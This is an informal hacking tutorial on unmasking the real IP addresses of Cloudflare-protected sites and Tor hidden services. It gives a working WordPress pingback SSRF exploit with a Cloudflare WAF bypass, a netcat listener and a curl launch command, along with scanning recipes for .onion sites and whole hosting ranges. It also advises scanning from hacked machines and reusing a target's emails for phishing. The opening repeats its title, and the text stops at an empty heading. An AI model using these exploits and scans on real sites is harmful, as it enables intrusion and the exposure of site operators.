[[ Tutorial on unmasking Cloudflare and Tor hidden services - v0.8 ]]


Introduction / FAQ
- What is cloudflare or a tor hidden service? Why is this a giant pain in [[ Tutorial on unmasking Cloudflare and Tor hidden services - v0.8 ]]


Introduction / FAQ
- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?
- How long will this guide be useful for?
- What about Windows?
- What are the chances of success?
- What do I do (about hacking a site) if I can't unmask the site?
- How to use nmap or other tools on a tor site
- Cloudflare Unmasking Hacks That Don't Work Anymore

General Techniques for Unmasking Hidden Sites
- SSRF (exploits!)
- Wordpress's Built In SSRF
- Actual exploit with a CloudFlare bypass
- Uploading Avatars on Forums, and Similar Common SSRFs
- Other stuff that probably connects out
- More tools

Email
- It's not hard to get most normal websites to email you
- Ask people to email you

DNS records
- MX records
- MX records that might sort of point in the general direction
- Using search engines and databases to find the real ip addresses of websites
- DNS History sites
- Brute forcing subdomains

Searching for sites based on hunches as to where they might be located
- It's kind of like using a pirate map
- Bulletproof webhosts
- Hosting companies known for hosting drug related content
- Brute forcing vhosts (and why it's a dead end)

Mapping the site structure
- Javascript files
- APIs
- Other loot

Misc Exploits/Misconfigurations/Tools
- Status Pages
- Wordpress upload directory
- changelog.txt
- Google Image Search
- Burp Collaborator Everywhere plugin
- XML input forms (XXE attacks)
- IP addresses and hostnames in output
- Google dorking for stuff
- End User attacks
- DoS attacks


[[[ Introduction / FAQ ]]]

- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?

Cloudflare is an anti denial of service company that works by actually hiding a website. Requests to the website hit cloudflare servers first, which decide based on your ip and browser whether or not to send you to the site. The servers are some kind of reverse proxy (look it up if you've never heard of one). As an added benefit they also cache static website pages and have an optional WAF that'll fairly bad but will still interfere with your scanners. Most importantly, each ip address is only allowed to make around 23,000 requests.
You've seen cloudflare protected sites before. If you use Tor Browser to browser on normal internet you'll notice lots of sites with orange cones that want you to identify all the traffic lights in a picture. That's a cloudflare reverse proxy deciding if you're a bot. If you're trying to hack the site, all the proxies in the way get annoying.
A tor hidden service is a .onion site. There are a lot of really well thought out hidden services and this guide really won't help you that much with them. There's also a lot of really shitty vendor sites, scammers, and collections of complete weirdos that have a lot worse of security. The biggest challenges with tor sites is they rarely enable cryptographic services you can fingerprint (SSL, SSH), don't have any DNS you can use, and usually have captchas everywhere.
Some of the additional challenges involving finding tor sites include: it's harder to verify whether you've found the correct server, they don't have DNS records, and frequently have other annoyances like lots of captchas and a higher level of security. On the brighter side you can portscan tor hidden sites - with cloudflare protected sites you're limited to connecting to https until you figure out where the site is actually located.


- How long will this guide be useful for?

The last two best ways of unmasking hidden sites have stopped working in the last couple years; SSL search engines and some DNS hack that used to work 100% of the time (http://www.crimeflare.org:82/cfs.html). Unfortunately Cloudflare seems to have fixed these issues and is taking some half assed steps towards making sites slightly less identifiable by their ssl certificates.
I've organized this document from most to least commonly vulnerable type of attack. Techniques on the bottom can still work once and a while, and anyway some of the people reading this will have more success with some of the attacks than I have. It just always works that way.


- What about Windows?

All the example commands here use Linux. Many of them (like nmap) undoubtable work on Windows. Just use Linux and if you're trying to figure out a distribution for hacking stuff like this try Kali Linux. It's a fairly recent version of debian stuffed full of fully functional hacking tools, which is useful.


- What are the chances of success?

Idk. On any specific site it really depends on the technical skills and attention to detail of the people running the site and how much they care about being unmasked. It's not a bad idea to find a giant collection of sites that you wouldn't mind unmasking and try some of these attacks on one after another - it'll go way faster than doing them one at a time.


- What do I do (about hacking a site) if I can't unmask the site?

If you want to launch hacks on some site and can't unmask it, you can still attack them through the cloudflare reverse proxy. Their proxies aren't that smart and only use captchas on Tor users. Their WAF is not hard to get around, and also gives you a 403 error code with the cloudflare brand so you know exactly when it's being the problem.
Cloudflare has a max number of requests per ip, and since you can't use tor, that can really slow things down a bit. I notice I can usually get aroudn 22-23k requests per ip before getting blocked for the day.
If you search reddit.com/r/netsec some people have clever rotating proxy arrangements that involve automatically setting up hosts in AWS. This will get your AWS account banned pretty quickly, but in the mean time you're fine. I'm not that elite, so I usually just launch scans from a few different hacked hosts. There's always at least 10 morons online who're rootable if you just scan for an exploit you know works.


- How to use nmap or other tools on a tor site

Cloudflare protected sites will only allow access to https via their url. Tor hidden services allow for nearly any sort of TCP connection, so if you combine a tool like proxychains4 (aka proxychains-ng, it's just called proxychains4 in the Kali linux repo) with anything that does normal non-raw connections to a site, you can port scan, directory brute force, etc over the socks proxy that comes with the standard tor daemon.
When using nmap you have to be careful not to do anything that requires raw sockets. You can also just launch it as a non-root user. -sT = TCP scan, -sV is lua based version detection and most important -sC launches any lua script that seems appropriate. Many of the scripts that come with nmap are for gathering information, so I'd really recommend trying them out.

Proxychains without the -q flag will tell you "socket error or timeout" about every closed port, but it's nice to be able to check that it's working. The .onion site will show as having a DNS of 224.0.0.1.

Nmap example:
proxychains4 -q nmap -P0 -sT -sV -sC -F -T4 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.onion

The ip address should come up as 224.0.0.1 and if you omit -q from proxychains it'll tell you that it timed out for every single closed port. I use -F when scanning tor sites because I'm impatient and I'm not sure tor will send a port like 23153 through anyway. I read some tor specification and I swear it said that tor doesn't actually use tcp port numbers. Anyway don't take my word for it, to specify every possible port use -p- instead of -F.

What you'd like to find are: Encrypted services that can be fingerprinted like https, ssh, smtps, etc. If it's encrypted it should involve a unique key. Banners that reveal other hostnames or ip addresses (it'd be nice if more ppl ran smtp on the darknet). Usually you just find an http port and not a lot else. You can do the exact same thing with proxychains4 and netcat and most hacking tools that work over tcp.


- Cloudflare Unmasking Hacks That Don't Work Anymore

There are tons of obsolete ways of discovering what's behind a cloudflare hidden website. The best was http://crimeflare.org:82/cfs.html - if you stick in the domain of a cloudflare protected site it would use some dns hack against cloudflare's dns servers that would give you the real ip address almost every time. Those were the days *sigh*. You can still occasionally use it to find other sites that are associated with the same cloudflare account as the target site (discussed later).
Another hack was looking up the site's ssl fingerprint using SSL search engines. Now-a-days cloudflare is allowed to make it's own SSL certificates, so you won't run into a situation where the exact same ssl certificate is used by the cloudflare reverse proxy and the real website (ever actually). Variations on this hack are still kind of useful, but it's really far from the automatic win it used to be. On top of all that, the best places to search for ssl fingerprints are nearly useless these days either with amazingly outdated information or seemly never having the site that you're looking for.
I'm going to go into this in a more detail later, despite it not being that effective anymore. I'll include the syntax to search via Shodan.


--== General Techniques for Unmasking Hidden Sites

- SSRF (exploits!)

An SSRF is a type of web exploit - it's when you trick a remote server into connecting out so you can grab it's ip address (in this case). Any time a server does http(s) out and you can control the destination it's an SSRF. They're good for a lot more than that - look up Eratic's Capitol One hack if you're interested in seeing what an insecure image upload/download form did to a bank.
SSRFs are well worth looking for, and I'd say these days it's my number one or two way of identifying the real ip address of websites. They work on both Cloudflare protected sites and Tor Hidden Services. Tor Hidden Services are extremely likely to be configured on servers that are specifically configured never to make outbound connections (around half the time for non-Impedya vendor sites).


- Wordpress's Built In SSRF

Wordpress has an API that has a pingback feature in it that can be used to force any wordpress site with it enabled to connect out, assuming a that a number of conditions are met. There's a lot of vendor sites that use Wordpress. The biggest deal breaker is that blog owner must have one normal blog post that they've made themselves. The also must have an accessable xmlrpc.php file "XML-RPC server accepts POST requests only." Cloudflare's WAF actually blocks pingback requests to the api, however there's at least one really obvious way of reformatting the request so it's not blocked that I'll share here.

Conditions:
- To check if a site is running wordpress visit https://sitehere.com/readme.html
- The url https://sitehere.com/xmlrpc.php needs to say something about only accepting POST requests when visited.
- The blog owner must have made two blog posts or pages. Usually people make a lot of them.
- It must be possible for the server to make an outgoing connection. Some tor hidden sites disable this in various ways.

All this exploit does is it takes the known wordpress pingback ssrf which uses an API request called pingback.ping and reformats it to use system.multicall api call. If this exploit ever gets blocked the Cloudflare, their WAF is such a PoS that there's probably a really large number of other ways of getting around it, (for example Wordpress seems happy with "pingback&#x002Eping" instead of "pingback.ping". Webmasters sometimes block the xmlrpc.php file since it can be used to brute force passwords.


- SSRF exploit for hidden sites (.com, .onion, etc).

Edit http://1.2.3.4/ to your listeners url and https://hidden-target-site.com/some-page-from-the-site to a blog post on the hidden site.

------------- request.txt -------------
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/blog-post-one</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/a-different-wordpress-page</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>


---------------------------------------

Run any of these commands as root to bind to port 80 and listen for a connection
Example listener command #1: nc -v -v -l -p 80
Example listener command #2: ncat -v -v -l 80
Example listener command #3: cd /dev/shm ; python -m SimpleHTTPServer 80

Launch the exploit with this curl command. Curl is not always installed by default.
Run the exploit:
curl -k -i -X POST http://target-site-here/xmlrpc.php -H 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@request.txt"

Run the exploit against a tor site:
Same deal but start with "proxychains4 curl"

If wordpress accepts the API request successfully then you should see "<name>faultCode</name><value><int>0</int>" in two places in the output. If nothing is stopping Wordpress from connecting out then you'll see the ip address of the server connect to you. There's some kind of rate limiting for pingback.ping so try to run the exploit correctly in the first 3 tries.


- Uploading Avatars on Forums, and Similar Common SSRFs

If you're trying to unmask a website that lets you sign up, please do so immediately and provide it with a valid email address. A convient site is http://mailinator.com - it'll let you use an email address and will show you the sending ip address. Some forums will let you upload a picture for your avatar. Some of them will let you give it the URL of a remote image and it'll actually go and download the file, exposing the ip address of the server in the process.
Any exploitable RFI can also be used like an SSRF and will give you the server's ip. If you can't get the avatar to load from your website, try looking for any sort of file, document, image, pdf, etc upload form. Upload forms are a frequent source of vulnerabilities in webapps so it's a good idea to spend time screwing with them anyway. You should stick your url into literally any form on the site that says it expects a URL. If you want to be through, anywhere that expects a URL or filename (which has a very slim but non-zero chance of working). It's a long shot but you can try sticking your url in ANY variable in a post that expects a filename. Why not? Even if remote fopen is disabled all sorts of things have libraries like curl built in that are capable of making http requests.

I wrote down a few different commands for easily listening to an ip address under the Wordpress SSRF exploit. If you're not sure if the world can reach your port and ip address, try using a website that will run nmap (there's lots of them).


- Other stuff that probably connects out

There's other things that'll connect out on the average website. Plugin updates, anything email related, cronjobs, forms that accept xml input and are vulnerable to XXE attacks, plugins that were written by idiots, some image conversion libraries (read https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html), document conversion software, PDF readers, and much more.
Overall SSRFs are either the #1 or #2 most reliable way to find a website's real ip address. #3 is probably MX (email server) DNS records, and #2 is probably getting the site to email you. After I discuss those I go into stuff that rarely works, at length.


- More tools

Onionscan has an automated list of checks that it makes against a tor site in order to find data about it. It tries to fingerprint the site in various ways, checks for status pages, open folders, and images that have exif data still included. One trick Onionscan uses is just to connect to http(s)://target-site-here/server-status to see if the Apache server-status is enabled for everyone. The nginx equivalent is http(s)://target-site-here/status . It usually isn't enabled (in either case) for non-localhost connection but if it's allowed it'll show everything that's connecting to the server.
Burp Proxy (Professional) will not find the site for you, but it's a big help. When you use it in proxy mode, it keeps track of all the *other* sites the main site loads files from. You can use this to find subdomains, CDNs, javascript files (which you can then go through for more URLs), and just to get a really good picture of the site's structure. Directory bruteforcing tools like wfuzz, dirb666, etc only show you files and urls that are on the main site. Burp can be configured to use tor for outgoing connections in it's options panel. Just set it to use SOCK5 on port 9050 and use the proxy for dns resolution.
I always brute force directories and files. Dirb666 is the easiest to use, but I take the wordlists from DirBuster (which is entertaining to watch but rarely does a good job). It takes a very long time to go through that long of a list of directories. I'll go into it when I'm discussing less successful attacks.


--== Email

- It's not hard to get most normal websites to email you

Email is yet another way websites connect out, so it's yet another way that badly run sites will leak ip address information. Sometimes just signing up for an account is enough - you should look for any place that you can register yourself on the site and hopefully you'll get an email telling you that your account is active. If you can't setup an account look for a lost password link. Some of them email you even if you don't have an account.
It's really uncommmon these days but you should double check that contact forms don't submit an email address when you use them. There's a bunch of old exploits for contact forms like the phpmailer exploit which is almost 5 years old. ImageTragick is worth checking, and I'm not sure if it supports it but old versions of TimThumb (included in many wordpress themes) will accept urls as an argument. I don't know if it still does. ??? check
If it helps, most email contact forms at some point use the venerable sendmail command line client (which isn't the same as the daemon of the same name). It's kind of a standardized utility, so if you're trying to figure out what parameters to inject into an email mailer, look at it's man page. The old phpmailer exploit could definately be used to redirect email to yourself, but an ancient exploit.
If you haven't tried searching Google, Bing, and Yandex for email addresses that you've found you probably should. Just in general if you find other sites that appear to be associated with the one you're looking at you should try to track down their location as well since there's a good chance that they're hosted on the same machine.
Email shouldn't work on any tor hidden server setup by anyone with half a brain. In fact DNS shouldn't be enabled on any site that really wants to stay hidden (which is a massive hassle).


- Ask people to email you

If your target is a normal business of some sort, ask them for marketing information or help with something, then examine the full headers from the email they send you. As a plus you can use this email to make phishing email look more legitimate.


--== DNS records

There's a couple ways you can potentially unmask a cloudflare protected site using DNS. DNS attacks will not work on onion sites. The most common mistake is people are kind of morons about their MX (mail exchange) records. The other is that by bruteforcing subdomains and alternate tlds and stuff, you can frequently find other sites associated with your target. Sometimes the other sites are even on the same server, it's not hard to check.


- MX records

A MX record is how smtp servers know what exactly where they're supposed to connect to in order to send mail to that domain. A surpringly large amount of the time it points directly to the hidden site (maybe around 10%). Even if it doesn't point to the site, it's really common for email to be hosted by the same company that the site is getting it's webhosting from, which opens up a lot of scanning related possibilities. It's because it's a giant pain in the ass to run your own mail server. Remember that subdomains (including www) almost never have MX records, so if you can't find one try taking off the front of the url.

Example 1:

$ host -t MX www.xxxxxxxxxxxxxxx.net
www.xxxxxxxxxxxxxxx.net has no MX record
$ host -t MX xxxxxxxxxxxxxxx.net
xxxxxxxxxxxxxxx.net mail is handled by 0 dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net.
$ host dc-7aaba3c3a2fd.dxxxxxxxxxxxxxxx.net
dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net has address 82.221.131.63

Hm so 82.221.131.63 is their mail server. If you visit https://82.221.131.63 you'll get an SSL error message about a bad certificate, because it's actually for xxxxxxxxxxxxxxx.net. I figure it's ok to use them as an example since they've obviously put 0 effort into hiding their site, and I'm way to cheap to spend $100 to see if the avatar SSRF will work on them.
You can use the openssl s_client utility or the version of ncat that comes with recent versions of nmap to communicate with SSL encrypted ports. Since these days the main ip address might have a different SSL certificate than another host on the server, it's a good idea to check with the openssl client.

echo | openssl s_client -connect 82.221.131.63:443
echo | openssl s_client -connect 82.221.131.63:443 -servername correctsitename.net

If you look through the output you'll see the subject of the SSL certificate is xxxxxxxxxxxxxxx.net. I'll go into SSL in more detail later, but it's one of a few good ways of verifying whether or not a site is the target site. You can do this way easier with nmap:

root# nmap -PS443 -p443 -sT --script=ssl-cert 82.221.131.63
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-26 23:14 MST
Nmap scan report for www.drugbuyersguide.net (82.221.131.63)
Host is up (0.30s latency).

PORT STATE SERVICE
443/tcp open https
| ssl-cert: Subject: commonName=xxxxxxxxxxxxxxx.net
| Subject Alternative Name: DNS:xxxxxxxxxxxxxxx.net, DNS:cpanel.xxxxxxxxxxxxxxx.net, DNS:cpcalendars.xxxxxxxxxxxxxxx.net, DNS:cpcontacts.drugbuyersguide.net, DNS:mail.xxxxxxxxxxxxxxx.net, DNS:webdisk.xxxxxxxxxxxxxxx.net, DNS:webmail.xxxxxxxxxxxxxxx.net, DNS:www.xxxxxxxxxxxxxxx.net
| Not valid before: 2020-10-17T00:00:00
|_Not valid after: 2021-01-15T23:59:59

There's something really important I need to point out. Did you see in the openssl commands that I specified a field called "-servername ?" SSL sites these days are like http sites in that you can have more than one listening on the same ip address. The servername is like a vhost for https. You can alter that nmap command to look for a single servername. Keep in mind it has to be exactly right, so if the servername is "www.dumbsite.com" and you specify "dumbsite.com" it might miss it. Anyway...

How to do the same check with nmap including the servername:
nmap -PS443 -p443 -sT --script=ssl-cert --script-args="tls.servername=xxxxxxxxxxxxxxx.net" 82.221.131.63

If you're reading this to try to make your site harder to find, you should (if possible) leave the site on port 80 and absolutely never let it be the main site. When someone visits your server you want them to see a default "I just installed NGINX, what now?" website or something like that. Avoid https/ssl if possible, and don't have your site be the main site on the ip address.


- MX records that might sort of point in the general direction

The situation where the MX record points to the real main mail server happens more than you'd expect, but a sometimes it's simply pointing to a specific hosting companies' mail server. This can still be useful information. Other times it's pointed to things like bulk email services. These services usually try to figure out how many people have seen a message to appeal to more legitimate of marketing people.
So don't get too carried away and always do a whois on the ip and make sure it would make sense for a site to be hosted there. Also remember that while it's really unusual, subdomains can have their own MX records. The only place you really see that is at colleges so that each department can have their own mail server.
There's a section further down with information on doing scanning of ip ranges for websites you're looking for. I tried to organize this guide from likely to least likely to succeed so scanning for the site is down in the "unlikely to get anywhere but worth trying" section.


- Using search engines and databases to find the real ip addresses of websites

I'm going to be honest, this ALMOST NEVER WORKS anymore. I may as well show you how to do it however, maybe you'll be lucky where I've never succeeded.

https://crt.sh - I've mentioned this site before. It keeps track of ssl certificates that are made through some industry standard log. It's the best place to start by far, but it's not going to give you a fingerprint you can stick into another site. It's also a good source of subdomains that you're unlikely to guess.
So search crt.sh for your target site's name. You'll usually get a list of every SSL cert they've bought, including various fingerprints and the ssl serial number (which is different). A bunch will be provisioned by cloudflare. Letsencrypt is the free SSL certificate server, Comodo + Verisign are large SSL certificate vendors, etc. You can try sticking the fingerprints and ssl serials into shodan but it almost never works. I would say that it has never worked for me but I appear to have just

https://shodan.io - Don't get me wrong shodan is a really cool site. It scans certain ports on the internet (including ssh/ssl) and lets you search through their results using a number of really useful attributes. The problem is I never find anything. Also you need to sign up. I can find interesting stuff using it, but I can't find exact sites. The things you can search for can be found here: https://beta.shodan.io/search/ but I've had limited luck in finding things I want to find. For one, they only index the SSL certificate that's provided by default. I was about to say that I've never gotten it to work, but it just found the ip addresses of imgur's Varnish Caching servers (they go immediately in front of your website)

To try search for ssl.cert.subject.cn:imgur.com
ssl.cert.fingerprint:
ssl.cert.serial:036b1f6c7d65d16539f32751d0d5eb2afb75 (not the same as the cryptographic fingerprint)
and it's usually a good idea to try subdomains that you saw on crt.sh

Remember that you can get ssl/ssh fingerprints from nmap!

Other SSL search engines:
https://certdb.com https://censys.io https://spyse.com
CertDB now Spyse.com's data is incredibly outdated, but it'll occasionally tell you where sites used to be hosted. If you click around enough it'll sometimes give you some outdated ip addresses for the sites or names of hosting companies that used to be used. Any of them will do for this quick check.

http://crimeflare.org:82/cfs.html - This site used to be a 90% successful way of finding the real ip of a website, but there's still something useful you can do with it. If the website is using cloudflare's DNS servers (which pretty much only marketing companies these days) you can usually pull up a list of other sites served by the same DNS servers. For example, searching for "clickfunnels.com" and then clicking on the dns server name "jim rush" takes you here: http://www.crimeflare.org:82/cgi-bin/domlist/_14056-jim-ruth - a huge list of sites all of which are cloudflare protected and many of which are obvously operated by the same marketing company.


- DNS History sites

There are millions of them, try a google searching for them. Most of them want you to at least make an account, a few want money. That's probably why I don't use them but should, for every good database out there there's 10 crappy ones.
The idea is sometimes people start off as a non-protected site and then later change their minds and purchase cloudflare, and it's original DNS history may still be a valid ip address for the website. I don't do this much since it costs money but I probably should be. I think. If it works for you let me know.


- Brute forcing subdomains

It's a really common hacking tactic to you bruteforce (guess) subdomains for a known main domain. Obviously this only works on CloudFlare. It's really easy to do and there are many many tools that can do it. All your really need are a good list of subdomains (or two, or three). The basic idea is if you can find a subdomain that's either not hidden or badly hidden and then you can use that subdomain to try and locate your main target.
The end result is potentially a list of related websites that might not be as actively hidden as the main website. To bruteforce subdomains I use a combination of the hostnames.txt file that comes with recon-ng and the subdomains-top1million-110000.txt from https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS.
You might also want to edit your /etc/resolv.conf to use a public nameservers like 4.2.2.1 or 8.8.8.8. Home isps sometimes redirect your nonexistant dns requests to a webpage filled with ads. Public nameservers sometimes won't let you make more than a certain number of requests. You should keep an eye out for subdomains with names like: test, stage, staging, <software name>, vpn, corporate, internal, cdn, anything that seems numbered, etc.
Subdomains named staging, test, lab, stage, are places you test a site before uploading it to the main site. Frequently that means there's extra information in error messages. VPN is a good one since in the last 2 years at least 6 VPN exploits have been released. Corporate can be stuff like filesharing servers, but I'm sort of off task.
There's some tools that you can load subdomain wordlists into. The top one, sublist3r also searches several websites for the url you're looking for. There's also tools that can do unrestricted bing/google/yahoo searches but I generally don't use them because you need to buy (request?) API keys to use various search engines. Recon-ng probably isn't the best tool to do that but works reasonably well. In the list of bash commands I included a command that you can use to combine wordlists and remove duplicate entries.

Tools:
Sublist3r - automated database recon and dns brute forcing
recon-ng - interface is slightly annoying, but it comes with a decent wordlist. It does a lot more than dns bruteforcing if you set up the other features.
dnsmap - autodetects things that dumber bruteforcing tools will not, like wildcard subdomains (you can make a subdomain like *.foobar.com, and anything.foobar.com will have the same ip as *.foobar.com).
... and way more!

Wordlists:
https://github.com/lanmaster53/recon-ng/archive/v4.9.6.tar.gz - hostnames.txt from recon-ng/data, it's a very good list but i've found it missing a small number of important hostnames
https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS - This site is awesome
https://wordlists.assetnote.io/ - this I just got from reddit today, and has more amazing wordlists. Good wordlists make a HUGE difference.

Useful bash commands:
Organize and remove duplicates - cat wordlist1.txt wordlist2.txt wordlist3.txt | sort | uniq > wordlist-all.txt
Do NOT redirect your output to a file that's also used for input! You'll delete the file.
whois - there's a few versions of essentially the same program. If you're not familiar with whois please go hit yourself with something. You'll probably have to install it, some versions are mwhois and jwhois.


--== Searching for sites based on hunches as to where they might be located

If you've gotten to this point your chances of figuring out where the site is located are actually pretty low. We've gone from really solid ways of getting ip info, to slightly sketchier ways, to databases that rarely work, to this: brute force scanning. If you can come up with some suspect hosting companies it doesn't take too long to scan all of them for the site you're looking for. You generally won't find it but it's kind of fun and not hard to do. After this section there's a variation for tor sites - while you generally have no clue where they are actually located, there's a limited number of hosting companies that are friendly towards DNMs and vendor sites. If you get a good list you can just scan all of them.
If you're wondering why I'm obsessed with using SSL it's because it's accurate - a site with "www.foobar.com" in it's SSL certificate is pretty unambigious. You'd think you can do the same thing with non ssl http sites and you really can't for what it's worth.


- It's kind of like using a pirate map

Sometimes you'll run into a situation where you either have a strong guess about where a website is hosted. Maybe their cpanel is branded, maybe their MX record is pointed somewhere interesting, or maybe it's "general knowledge" they're hosted somewhere or in a specific country.
To scan an entire webhost or small ISP, do a whois on their IP address and grep for the AS (it'll be there somewhere). Go to https://bgp.he.net and search for ASXXXX where XXXX is the number you saw in the whois records. That'll give you an official company name. Search https://bgp.he.net again for that company name and you'll wind up with a list of Autonomous Systems. Each AS is responsible for keeping track of a number of blocks of ip addresses. (I'm avoiding explaining what an AS is. It's the BGP thing, go look it up if you want to know how the internet works). I don't have a tool to do it, but if you visit each AS and then go to IPv4 Prefixes you can make a textfile that's basically a giant list of ip address/cidr netblock that'll look like:

Fake example:
185.4.211.0/24
200.128.0.0/16
200.129.0.0/16
200.139.21.0/24
200.17.64.0/16
Total ips: 145796

Store that all into a file, we'll call it netblocks.in.txt. An example the command to scan all them all with nmap is:

nmap -sS -sV -sC -T5 -p1-65535 -iL netblocks.in.txt

The important part is -iL netblocks.in. It'll take some time but it's quite possible to run nmap completely automatically and let it chew through every potential ip address looking for the site you're looking for using ssl subject and servername requests to try to find an exact match. Make sure you save your data. There's another portscanner called masscan that you might want to try. It's almost exactly the same speed as nmap if you need to scan every port on a host, but if you only want to scan ports 80, 22, or 443 then it's so much faster your head will spin.

Compare:
time nmap -sS -p80 -PS80 200.129.0.0/16
time masscan -p80 200.129.0.0/16 --rate 5000

The other cool thing about masscan is it has it's own tcp/ip engine and can run through vpns that don't have routing setup. I'm not going into it but it's really useful if you're using a VPN provider from a hosted virtual machine.
You can take this sort of search even further. It's quite possible to scan entire countries. Many of them are considerably smaller than large cloud providers like AWS. If you look around you can find lists of netblocks per country in cidr format. Masscan supports -iL like nmap does, so you can use the list of netblocks as your input for the scanner. In ALL THESE CASES make sure you save your output to a file!!!!!!


- Bulletproof webhosts

If you've scanned a tor site and it has SSH open you can use nmap (both over tor and while scanning a hosting company) to try to find a fingerprint that matches both. Tor sites almost never have SSH open, but I need something to be uniquely idenifiable to make this demonstration. Without a way of verifying onion sites other than looking at it, being at this part of the document is not a sign of success. Regardless there's a fairly short and sweet list of hosting companies that are shady enough to host darknet markets. Cloudflare sites are generally hosted almost anywhere normal.
Shady hosting companies like this are known as "bulletproof hosting companies" and are way more popular for tor hidden sites than average. Some specialize in spam, others in malware, piracy, etc. Also, for some reason you can find quite a few vendor shops (including really big ones) hosted by GoDaddy for some reason. In one case I found a huge well known vendor site being run by GoDaddy - as far as I could tell. In that case what was possibly their real ip address was exposed by a PDF invoice download form that took the data from a server hosted by GoDaddy. It doesn't mean for sure they're hosted there, but there's a really good chance they are.
If you are thinking of setting up a hidden site I really wouldn't use a normal hosted website like GoDaddy, The Planet or HostGator. People that use big hosting sites should expect close to no privacy. I have noticed that tons of hidden websites use CDNs (content delivery networks). Figuring out what CDN a hidden site uses generally isn't that useful, but it's nice to know.


- Hosting companies known for hosting drug related content

Here's a few popular shady-ass hosting companies that tend to host more than a normal share of DNMs and vendor sites. For some reason GoDaddy is popular for vendor sites as well. It's huge, you have no privacy, and I have no idea why you'd put your site there. Cloud providers like AWS are way too big to scan. Lastly, a few of these hosting providers try to use or lease out ip address space that doesn't have their name on it (specifically so you can't scan for sites). That's not that common until you're talking about places like OrangeWebsite or CyberBunker (busted). Here's a somewhat outdated list of popular hosts from when the crimeflare hack worked:

www.orangewebsite.com (biggest one)
Icenetworks Ltd. (I think this is actually orange website) - https://bgp.he.net/search?search%5Bsearch%5D=Icenetworks+Ltd.&commit=Search
www.hawkhost.com
godaddy.com
knownsrv.com
ititch.com
singlehop.com

There's always one or two tiny onion hosting companies that are popular for hosting only onion sites and they're usually quick to check out. They also tend to die a lot by being hacked, for example Daniels Hosting, Freedom Hosting, and Freedom Hosting II have all been hacked out of existance. If they have replacements you should check them for your target site.


- Brute forcing vhosts (and why it's a dead end)

Nmap has a script that'll allow you to search for domains on webservers from a list. If you have a target site and list of associated sites or subdomains you can check a number of webservers to find target using a vhost. There are two problems. The first problem is tor site operators might not be using a standard port number (like 80 or 443). The second and less expected problem is around 1 in 10 websites will respond to a standard http request for _any_ vhost and either send you to the same site, or redirect you with a 301/302 http redirect or something that'll screw up your search. If you scan http (non ssl) sites for vhosts expect to see large numbers of false positives.
Here's how to run this script anyway. subdomains-found.txt is stuff you've discovered, and the main site is just an argument to the script I've called target-site.com. Netblocks.txt is the netblocks you've selected to search

nmap -sS -p80 -T5 --open --script=http-vhosts --script-args="http-vhosts.domain=target-site.com,http-vhosts.filelist=subdomains-found.txt" -iL netblocks.txt.

It's one of the few ways you can *try* to locate an onion site without an SSL or SSH fingerprint which you'll generally never have. Unfortunately the high rate of false positives makes it pretty useless.


--== Mapping the site structure

I've mentioned mapping the site before. It doesn't have a good rate of success on it's own, however if you explore and map out the site it'll give you a lot of additional information that you'll probably find useful anyway - forms, addresses and phone numbers, upload scripts, information about image hosting and CDNs, subcontractor names, company names, email addresses, the occasional raw ip address or hostname, and subdomains that you never would have guessed. This isn't going to be a guide on how to use dirb666, wfuzz, etc.
Obvious defensive note: If you're running ANY sort of a darknet site you really need to have your own small network, virtualized, real, whatever. Your webservers can not know their real ip addresses and should at the very least be behind some sort of NAT, SNAT, or other port forwarding/address translation.

Bash command - this command is just useful! It'll pull every valid ip address out of file.txt:

grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt

It'd be nice to have a burp plugin that'll alert you when you see a valid ip address. Maybe there already is one and I can't find it. Anyway if you haven't found the site yet, doing this sort of mapping the site through cloudflare is extremely annoying. Doing this sort of thing to a tor site is a lot more straightforward, but proxychains tends to be unstable so neither is fun at all.
The quality of your wordlists is really important. If you're scanning through cloudflare or precariously tunnelling your requests through tor's socks proxy, you don't want to waste a lot of requests. You can do things like search for directories for / (non-recursively) and then use a wordlist of php files to find php files in the directories that are found. You can always scan directories you've found again. Most darknet sites are written in PHP and while anything can be hidden behind cloudflare but it's usually a CMS of some sort.

Tools for mapping site structures:
robots.txt and sitemap.xml
Burp Proxy (in proxy mode)
OWASP Zap (I assume, it really should be able to)
dirb666 - my favorite
wfuzz - syntax is weird but its more flexable than dirb666. It also requires way more memory to run. So, the first parameter you're fuzzing is called FUZZ, the second one (in order that you defined it on the cli) is FUZ2Z, etc.


- Javascript files

Javascript files that aren't generic ones tend to have a lot of urls in them. You can then see what these urls have to do with the main site. Most of them won't be relevant but it's really an interesting place to look. As an added plus you can get details about how to use valid urls. You can also use cellphone apps to get similar lists of URLs but I haven't seen a hidden site with an Android app yet.

Tools:
JSScanner - https://github.com/dark-warlord14/JSScanner.git - https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/


- APIs

